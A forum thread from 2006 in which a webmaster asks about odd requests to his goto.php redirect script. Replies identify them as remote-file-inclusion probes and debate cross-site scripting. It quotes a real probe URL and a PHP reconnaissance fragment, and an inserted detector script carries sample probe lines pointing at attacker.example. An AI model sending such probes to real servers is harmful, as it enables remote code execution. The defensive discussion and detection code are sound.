strange requests sent to my WWW

on 12.04.2006 22:06:37 by piotr_sobolewski

Hello,

On my website I have such a PHP script, goto.php (pseudocode):



Generally, it redirects the user to the URL provided as the "goto" argument.

For several weeks now I have been seeing in my logs that somebody, apparently
using Lynx, requests URLs like:
/goto.php?goto=http://include.intec.edu/breakend_old/abc.txt

where abc.txt is just the source of some PHP script:
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$infoo = "Link: $HTTP_HOST$REQUEST_URI";
$infoo = "Info: $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else
$pro3="/usr/bin/wget No";
if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else
$pro4="/usr/bin/lynx No";
(...)

Now I can't figure out why somebody sends such strange requests. Does anybody
have any idea?

Thanks in advance!

--
http://www.piotrsobolewski.w.pl/
obfus_01@gazeta.pl obfus_02(at)gazeta.pl obfus_03[at]gazeta.pl

Re: strange requests sent to my WWW

on 12.04.2006 22:38:04 by Scott W Gifford

piotr_sobolewski@nospampse-o2.pl writes:

> On my website I have such a PHP script, goto.php (pseudocode):
>
>

[...]

> For several weeks now I have been seeing in my logs that somebody, apparently
> using Lynx, requests URLs like:
> /goto.php?goto=http://include.intec.edu/breakend_old/abc.txt
>
> where abc.txt is just the source of some PHP script:
> $HTTP_HOST = getenv("HTTP_HOST");
> $REQUEST_URI = getenv("REQUEST_URI");
> $infoo = "Link: $HTTP_HOST$REQUEST_URI";
> $infoo = "Info: $HTTP_HOST$REQUEST_URI";
> if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
> if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else
> $pro3="/usr/bin/wget No";
> if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else
> $pro4="/usr/bin/lynx No";
> (...)
>
> Now I can't figure out why somebody sends such strange requests. Does anybody
> have any idea?

If you had been less careful writing your script, and had instead
said:



your script would have downloaded and executed the PHP script in
abc.txt, which from the part shown is gathering information about your
server. If the attack succeeded, it probably would have sent this
information back to the attacker, who could add your server to a list
of "zombie machines" which are willing to execute arbitrary commands.

Fortunately, you were more careful, so the script is just wasting
time. Probably there's another widely-used program called goto.php
that is poorly written, and what you're seeing is an automated script
trying this on thousands of hosts, one of which happens to be yours.

On another note, though your script is safe from that attack, you may
be vulnerable to a less severe cross-site scripting attack, and should
really escape any HTML that happens to be in $goto.

----Scott.
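Scott's point is that the requests are an automated remote-file-inclusion probe: a parameter whose value is itself a URL to a remote script. The following detector is an added example, not code from this thread or from either poster; it parses a few constructed Apache "combined" log lines (the hostnames and addresses are placeholders) and reports every request in which some query parameter carries an absolute http(s) URL, which is the signature the original poster saw in his logs.

```php
<?php
// Added example (not from the thread): flag log lines in which a query
// parameter value is itself an absolute http:// or https:// URL, the
// signature of the automated remote-file-inclusion probes discussed above.
// The log lines below are constructed for illustration; the hosts are
// placeholders, not real scanner sources.

declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [12/Apr/2006:21:58:03 +0200] "GET /goto.php?goto=http://attacker.example/abc.txt HTTP/1.0" 302 0 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14"
198.51.100.7 - - [12/Apr/2006:22:01:11 +0200] "GET /goto.php?goto=/news/ HTTP/1.1" 302 0 "http://www.example.net/" "Mozilla/5.0"
203.0.113.5 - - [12/Apr/2006:22:03:45 +0200] "GET /index.php?page=http://attacker.example/abc.txt? HTTP/1.0" 200 4231 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14"
192.0.2.9 - - [12/Apr/2006:22:05:02 +0200] "GET /goto.php?goto=http%3A%2F%2Fattacker.example%2Fabc.txt HTTP/1.0" 302 0 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14"
LOG;

/**
 * Parse one Apache "combined" log line into its fields, or return null
 * when the line does not match the format.
 */
function parse_combined(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

/**
 * Return the names of query parameters whose URL-decoded value is an
 * absolute http:// or https:// URL. An empty array means nothing suspicious.
 */
function remote_url_params(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);   // parse_str also URL-decodes the values
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^https?://#i', $value)) {
            $hits[] = (string) $name;
        }
    }
    return $hits;
}

/**
 * Scan a log blob and return one record per request that looks like an
 * RFI probe: source address, request target, offending parameter names
 * and the User-Agent string.
 */
function find_rfi_probes(string $log): array
{
    $found = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $rec = parse_combined($line);
        if ($rec === null) {
            continue;
        }
        $params = remote_url_params($rec['target']);
        if ($params !== []) {
            $found[] = ['ip' => $rec['ip'], 'target' => $rec['target'],
                        'params' => $params, 'ua' => $rec['ua']];
        }
    }
    return $found;
}

// Three of the four constructed lines are reported; the plain "/news/"
// redirect is not.
foreach (find_rfi_probes(SAMPLE_LOG) as $hit) {
    printf("%s probed %s via parameter(s) %s (UA: %s)\n",
        $hit['ip'], $hit['target'], implode(',', $hit['params']), $hit['ua']);
}
```

Note that the check decodes the query first, so a percent-encoded `http%3A%2F%2F` value (the last sample line) is caught as well; a detector that only greps the raw log for `=http://` would miss it.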

Re: strange requests sent to my WWW

on 13.04.2006 10:33:15 by piotr_sobolewski

Scott W Gifford wrote:

>> On my website I have such a PHP script, goto.php (pseudocode):
>>
>>
>> (...)
>> For several weeks now I have been seeing in my logs that somebody, apparently
>> using Lynx, requests URLs like:
>> /goto.php?goto=http://include.intec.edu/breakend_old/abc.txt
>
> If you had been less careful writing your script, and had instead
> said:
>
> your script would have downloaded and executed the PHP script in
> abc.txt (...)

Oh, yes, this explains a lot! Thanks for the good idea!

> On another note, though your script is safe from that attack, you may
> be vulnerable to a less severe cross-site scripting attack, and should
> really escape any HTML that happens to be in $goto.

Why? Any HTML code somebody puts in $goto will be interpreted on the local
machine of the guy who sent the request.

--
http://www.piotrsobolewski.w.pl/
obfus_01@gazeta.pl obfus_02(at)gazeta.pl obfus_03[at]gazeta.pl

Re: strange requests sent to my WWW

on 13.04.2006 16:20:45 by Scott W Gifford

piotr_sobolewski@nospampse-o2.pl writes:

> Scott W Gifford wrote:

[...]

>> On another note, though your script is safe from that attack, you may
>> be vulnerable to a less severe cross-site scripting attack, and should
>> really escape any HTML that happens to be in $goto.
>
> Why? Any HTML code somebody puts in $goto will be interpreted on the local
> machine of the guy who sent the request.

Right, that's a cross-site scripting attack:

http://www.cgisecurity.com/articles/xss-faq.shtml

Putting clever HTML in there makes it possible to steal from the
client any cookies you've set on your site if they visit a link, trick
somebody who trusts your site into viewing the attacker's page
thinking it's yours, or leverage any special trust somebody has in
your site (for example if a client has allowed it to install code,
show popups, run ActiveX, etc.).

----Scott.

Re: strange requests sent to my WWW

on 13.04.2006 17:23:08 by Sebastian Gottschalk

Scott W Gifford wrote:
> piotr_sobolewski@nospampse-o2.pl writes:
>
>> Scott W Gifford wrote:
>
> [...]
>
>>> On another note, though your script is safe from that attack, you may
>>> be vulnerable to a less severe cross-site scripting attack, and should
>>> really escape any HTML that happens to be in $goto.
>> Why? Any HTML code somebody puts in $goto will be interpreted on the local
>> machine of the guy who sent the request.
>
> Right, that's a cross-site scripting attack:
>
> http://www.cgisecurity.com/articles/xss-faq.shtml

Did you miss the HTML meta redirect? The attacker's code will not show up
in the context of the attacked website.

Re: strange requests sent to my WWW

on 13.04.2006 17:43:24 by Scott W Gifford

Sebastian Gottschalk writes:

> Scott W Gifford wrote:
>> piotr_sobolewski@nospampse-o2.pl writes:
>>
>>> Scott W Gifford wrote:
>>
>> [...]
>>
>>>> On another note, though your script is safe from that attack, you may
>>>> be vulnerable to a less severe cross-site scripting attack, and should
>>>> really escape any HTML that happens to be in $goto.
>>> Why? Any HTML code somebody puts in $goto will be interpreted on the local
>>> machine of the guy who sent the request.
>>
>> Right, that's a cross-site scripting attack:
>>
>> http://www.cgisecurity.com/articles/xss-faq.shtml
>
> Did you miss the HTML meta redirect? The attacker's code will not show up
> in the context of the attacked website.

Hi Sebastian,

Imagine that $goto is set to:

">

The page is then this:

">

My copy of Firefox 1.5 happily executes this JavaScript code. Over
and over again, in fact.

Breaking out of contexts where at first glance it seems safe to put
arbitrary HTML is the essence of any cross-site scripting attack.
It's always safer to escape any user-controlled data before including
it on a Web page, and there's almost never a good reason not to.

In my experience, it's usually faster to just escape the HTML than to
try and convince myself whether or not there's a real possibility of
an attack.

----Scott.

Re: strange requests sent to my WWW

on 13.04.2006 18:06:31 by Sebastian Gottschalk

Scott W Gifford wrote:

>> Did you miss the HTML meta redirect? The attacker's code will not show up
>> in the context of the attacked website.
>
> Hi Sebastian,
>
> Imagine that $goto is set to:
>
> ">
>
> The page is then this:
>
> ">

Now I remember why I wondered. Recent PHP versions support tainting, so
even if the PHP script was used in a legitimate way, it would normally
fail due to the absence of any untainting parser mechanism. Sorry,
missed that.

> Breaking out of contexts where at first glance it seems safe to put
> arbitrary HTML is the essence of any cross-site scripting attack.

Not any, just some. Breaking into contexts or keeping references to a
supposedly discarded context can be fun as well.

> It's always safer to escape any user-controlled data before including
> it on a Web page, and there's almost never a good reason not to.

I would only do so if it's unavoidable with respect to the application.
Whitelisting all allowed values and, if possible, just passing indexes is
much better.